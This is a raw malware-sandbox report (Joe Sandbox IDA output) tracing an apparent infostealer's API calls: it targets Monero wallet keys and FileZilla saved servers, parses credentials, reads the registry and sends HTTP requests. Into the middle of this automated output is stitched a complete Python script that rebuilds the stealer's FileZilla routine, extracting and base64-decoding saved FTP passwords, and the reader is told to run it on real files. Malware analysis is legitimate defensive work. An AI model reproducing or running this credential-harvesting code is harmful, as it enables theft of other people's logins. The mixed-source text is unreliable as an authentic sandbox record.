                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,003A0DBA,003A0DB7,003A0DB6,003A0DB3), ref: 00390362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00390369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00390385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 003903CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 003903DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00390419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00390463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00390562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00390571
                            • lstrcat.KERNEL32(?,url: ), ref: 00390580
                            • lstrcat.KERNEL32(?,00000000), ref: 00390593
                            • lstrcat.KERNEL32(?,003A1678), ref: 003905A2
                            • lstrcat.KERNEL32(?,00000000), ref: 003905B5
                            • lstrcat.KERNEL32(?,003A167C), ref: 003905C4
                            • lstrcat.KERNEL32(?,login: ), ref: 003905D3
                            • lstrcat.KERNEL32(?,00000000), ref: 003905E6
                            • lstrcat.KERNEL32(?,003A1688), ref: 003905F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00390604
                            • lstrcat.KERNEL32(?,00000000), ref: 00390617
                            • lstrcat.KERNEL32(?,003A1698), ref: 00390626
                            • lstrcat.KERNEL32(?,003A169C), ref: 00390635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: be84ad1ad8311be02e67bc22c9c744ec49c6bd1dc40b2ae9ea0711fce3886d62
                            • Instruction ID: a8200298fc44d078c5b74f27d1de36e15b50fe425833eb7423e421abd9c223a7
                            • Opcode Fuzzy Hash: be84ad1ad8311be02e67bc22c9c744ec49c6bd1dc40b2ae9ea0711fce3886d62
                            • Instruction Fuzzy Hash: 36D13D72910608AFDF06EBE4DD96EEE7778EF15300F404518F502BA091DF74AA0ADBA1
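The function above walks FileZilla's recentservers.xml with StrStrA for the four tags in its string table and concatenates a fixed record (browser, profile, url, login, password). The following is an added reconstruction of that logic for analysts who want to see exactly what such a record contains; it is not code from the sample or from Joe Sandbox. The XML is constructed to resemble %APPDATA%\FileZilla\recentservers.xml with no real credentials, and the unresolved literals 003A1678/003A167C/003A1688/003A1698/003A169C are assumed to be ":" and newline separators.

```python
"""Rebuild the FileZilla record assembled by the function at 0x390362.

Added example (analyst reconstruction). The listing searches the file with
StrStrA rather than parsing XML, so this uses plain substring search. The
':' between host and port, the newlines after each field and the blank line
between records stand in for literals the listing does not resolve.
"""
import base64
import re
from typing import Dict, List, Optional

# Constructed sample; layout mirrors FileZilla 3 recentservers.xml.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
      <Logontype>5</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""

# Tags the listing searches for, in the order of its StrStrA calls.
TAGS = {"Host": "<Host>", "Port": "<Port>", "User": "<User>",
        "Pass": '<Pass encoding="base64">'}


def substring_field(block: str, open_tag: str, close_tag: str) -> Optional[str]:
    """StrStrA-style extraction: text between open_tag and the next close_tag."""
    i = block.find(open_tag)
    if i < 0:
        return None
    i += len(open_tag)
    j = block.find(close_tag, i)
    return block[i:j] if j >= 0 else None


def parse_recent_servers(xml_text: str) -> List[Dict[str, Optional[str]]]:
    """One dict per <Server>; tags that are absent (key-file logons have no <Pass>) give None."""
    entries = []
    for block in re.findall(r"<Server>(.*?)</Server>", xml_text, re.S):
        entries.append({name: substring_field(block, tag, "</%s>" % name)
                        for name, tag in TAGS.items()})
    return entries


def decode_password(encoded: Optional[str]) -> Optional[str]:
    """<Pass encoding="base64"> holds the cleartext password base64-encoded."""
    if encoded is None:
        return None
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass; keep raw text
        return encoded


def format_record(entry: Dict[str, Optional[str]]) -> str:
    """Field order follows the lstrcat sequence and string table of the listing."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        "url: %s:%s\n"
        "login: %s\n"
        "password: %s\n\n"
    ) % (entry["Host"] or "", entry["Port"] or "",
         entry["User"] or "", decode_password(entry["Pass"]) or "")


def extract(xml_text: str) -> str:
    """Everything this routine would hand to the exfiltration code for one file."""
    return "".join(format_record(e) for e in parse_recent_servers(xml_text))


if __name__ == "__main__":
    print(extract(SAMPLE_XML))
```

Run it against a copy of your own recentservers.xml to see which saved logons are recoverable in cleartext; entries with Logontype 5 (key file) carry no password and show up with an empty password line.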
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                              • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003859F8
                            • StrCmpCA.SHLWAPI(?,0115E828), ref: 00385A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00385B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0115E8A8,00000000,?,0115A6A0,00000000,?,003A1A1C), ref: 00385E71
                            • lstrlen.KERNEL32(00000000), ref: 00385E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00385E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00385E9A
                            • lstrlen.KERNEL32(00000000), ref: 00385EAF
                            • lstrlen.KERNEL32(00000000), ref: 00385ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00385EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00385F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00385F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00385F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00385FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00385FBD
                            • HttpOpenRequestA.WININET(00000000,0115E788,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00385BF8
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • InternetCloseHandle.WININET(00000000), ref: 00385FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: 00df2adc4000d09b53eae8678efdfaaa9e588b00ec2ac04a8b1d027ffdfd257b
                            • Instruction ID: be3b68a4fe207f6e16eb3c53e2707aad3ccbfd44fc96c5b2f39c305df34fd96b
                            • Opcode Fuzzy Hash: 00df2adc4000d09b53eae8678efdfaaa9e588b00ec2ac04a8b1d027ffdfd257b
                            • Instruction Fuzzy Hash: C712F171820528ABDF16EBA0DC95FEEB778BF14700F504299F10A66091EF702A49DFA5
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0038D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0038D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D208
                            • lstrcat.KERNEL32(?,003A1478), ref: 0038D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D22A
                            • lstrcat.KERNEL32(?,003A147C), ref: 0038D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D24C
                            • lstrcat.KERNEL32(?,003A1480), ref: 0038D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D26E
                            • lstrcat.KERNEL32(?,003A1484), ref: 0038D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D290
                            • lstrcat.KERNEL32(?,003A1488), ref: 0038D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D2B2
                            • lstrcat.KERNEL32(?,003A148C), ref: 0038D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0038D2D4
                            • lstrcat.KERNEL32(?,003A1490), ref: 0038D2E3
                              • Part of subcall function 0039A820: lstrlen.KERNEL32(00384F05,?,?,00384F05,003A0DDE), ref: 0039A82B
                              • Part of subcall function 0039A820: lstrcpy.KERNEL32(003A0DDE,00000000), ref: 0039A885
                            • lstrlen.KERNEL32(?), ref: 0038D32A
                            • lstrlen.KERNEL32(?), ref: 0038D339
                              • Part of subcall function 0039AA70: StrCmpCA.SHLWAPI(01159110,0038A7A7,?,0038A7A7,01159110), ref: 0039AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0038D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 2e6fe513bb3b6d1cdddc236b3023b541a5ffcc86effae98166bd7c963e7b5d35
                            • Instruction ID: 57da89655aa0ababfb5db5da74ec57371d1a6649ca0afadb32593545044f7eda
                            • Opcode Fuzzy Hash: 2e6fe513bb3b6d1cdddc236b3023b541a5ffcc86effae98166bd7c963e7b5d35
                            • Instruction Fuzzy Hash: 08E11F71910518AFCF06EBA0DD96EEE7778BF24305F104258F106BA091DF35AE09DBA2
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                              • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00384915
                            • StrCmpCA.SHLWAPI(?,0115E828), ref: 0038493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00384ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003A0DDB,00000000,?,?,00000000,?,",00000000,?,0115E758), ref: 00384DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00384E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00384E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00384E49
                            • InternetCloseHandle.WININET(00000000), ref: 00384EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00384EC5
                            • HttpOpenRequestA.WININET(00000000,0115E788,?,0115DFC8,00000000,00000000,00400100,00000000), ref: 00384B15
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • InternetCloseHandle.WININET(00000000), ref: 00384ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 86e524fae4193bfd1a1d69553fffe1b0d02171da41b9bce476d7ff24003413bf
                            • Instruction ID: eb82dbc147df63bf3853bbf4796108b4aa75eb66df94355a39ca6133160286d9
                            • Opcode Fuzzy Hash: 86e524fae4193bfd1a1d69553fffe1b0d02171da41b9bce476d7ff24003413bf
                            • Instruction Fuzzy Hash: 8712D0729206189ADF16EB90DC92FEEB778BF55300F504299F10666091EF702F49DFA2
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0115CE08,00000000,?,003A144C,00000000,?,?), ref: 0038CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0038CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0038CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0038CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0038CAD9
                            • StrStrA.SHLWAPI(?,0115CE98,003A0B52), ref: 0038CAF7
                            • StrStrA.SHLWAPI(00000000,0115D000), ref: 0038CB1E
                            • StrStrA.SHLWAPI(?,0115DBC0,00000000,?,003A1458,00000000,?,00000000,00000000,?,011590F0,00000000,?,003A1454,00000000,?), ref: 0038CCA2
                            • StrStrA.SHLWAPI(00000000,0115DB20), ref: 0038CCB9
                              • Part of subcall function 0038C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0038C871
                              • Part of subcall function 0038C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0038C87C
                            • StrStrA.SHLWAPI(?,0115DB20,00000000,?,003A145C,00000000,?,00000000,01159100), ref: 0038CD5A
                            • StrStrA.SHLWAPI(00000000,01158E60), ref: 0038CD71
                              • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B46), ref: 0038C943
                              • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B47), ref: 0038C957
                              • Part of subcall function 0038C820: lstrcat.KERNEL32(?,003A0B4E), ref: 0038C978
                            • lstrlen.KERNEL32(00000000), ref: 0038CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0038CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: df8127a1c8ce5292c1b76ec11bf2224e1b6729876287c5a52a290cff920aaf1a
                            • Instruction ID: 7dd43e767064e1c80c8013c557f8a26ca7a028b7bcd8e73447b1425395b13a2d
                            • Opcode Fuzzy Hash: df8127a1c8ce5292c1b76ec11bf2224e1b6729876287c5a52a290cff920aaf1a
                            • Instruction Fuzzy Hash: FAE1FF71910518AFDF16EBA4DC95FEEBB78BF14300F404259F1066B191EF306A4ADBA2
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • RegOpenKeyExA.ADVAPI32(00000000,0115B328,00000000,00020019,00000000,003A05B6), ref: 003983A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00398426
                            • wsprintfA.USER32 ref: 00398459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0039847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0039848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00398499
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
